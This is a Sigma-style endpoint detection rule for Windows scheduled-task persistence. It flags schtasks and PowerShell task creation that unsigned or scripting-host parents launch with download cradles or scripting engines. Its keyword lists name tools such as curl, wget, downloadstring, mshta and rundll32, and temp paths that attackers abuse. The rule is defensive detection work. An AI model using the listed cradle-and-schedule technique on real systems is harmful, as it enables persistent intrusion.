edr-win-persist-schtask-abuse

```yaml title: Suspicious Persistence via Scheduled Tasks or PowerShell id: edr-win-persist-schtask-abuse status: stable description: > Detects persistence attempts via scheduled tasks or PowerShell from unverified or suspicious parent processes. Catches schtasks /create with short intervals invoking scripting engines or download cradles, PowerShell New-ScheduledTaskAction with suspicious payloads, and XML-based task creation from temp/public paths. references: - https://attack.mitre.org/techniques/T1053/005/ author: ShroudCloud date: 2026/04/16 tags: - attack.persistence - attack.t1053.005 logsource: category: process_creation product: windows detection: parent_filter: ParentCodeSignature|notin: - 'valid' - 'verified' ParentImage|endswith: - '\cmd.exe' - '\wscript.exe' - '\cscript.exe' - '\rundll32.exe' - '\regsvr32.exe' - '\wmic.exe' - '\mshta.exe' - '\powershell.exe' - '\pwsh.exe' - '\powershell_ise.exe' - '\wmiprvse.exe' - '\wsmprovhost.exe' - '\winrshost.exe' ParentOriginalFileName|endswith: - 'Command Prompt' - 'Microsoft ® Windows Based Script Host' - 'Microsoft ® Console Based Script Host' - 'Windows host process (Rundll32)' - 'Microsoft(C) Register Server' - 'WMI Commandline Utility' - 'Microsoft (R) HTML Application host' - 'Windows PowerShell' - 'PowerShell' - 'Windows PowerShell ISE' - 'WMI Provider Host' - 'Host process for WinRM plug-ins' - "Host Process for WinRM's Remote Shell plugin" parent_exclusion: ParentImage|endswith: - '\gpscript.exe' - '\msiexec.exe' persistence_schtasks: Image|endswith: '\schtasks.exe' CommandLine|contains|all: - ['/create', '-create'] cmdline_interval: CommandLine|contains: - 'once' - 'minute' - 'hourly' - 'daily' - 'onlogon' - 'onstart' cmdline_payload: CommandLine|contains: - 'curl' - 'wget' - 'downloadstring' - 'get-itemproperty' - 'cmd.exe /c' - 'powershell' - 'pwsh.exe' - 'mshta' - 'wscript' - 'cscript' - 'rundll32' - 'ssh' - 'python' - '$env:' persistence_schtasks_xml: Image|endswith: '\schtasks.exe' CommandLine|contains|all: - ['/xml', '-xml'] CommandLine|contains: - 'c:\windows\temp\' - 'c:\temp\' - '\perflogs\' - '\users\public\' persistence_powershell: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains|all: - 'New-ScheduledTaskAction' - ['curl', 'wget', 'downloadstring', 'cmd.exe /c', 'powershell', 'pwsh.exe', 'mshta', 'wscript', 'cscript', 'rundll32', 'ssh', 'python', '$env:'] condition: (parent_filter and not parent_exclusion) and (persistence_schtasks or persistence_schtasks_xml or persistence_powershell) falsepositives: - Legitimate scheduled tasks created by IT admin scripts (baseline by parent and workflow) level: high ```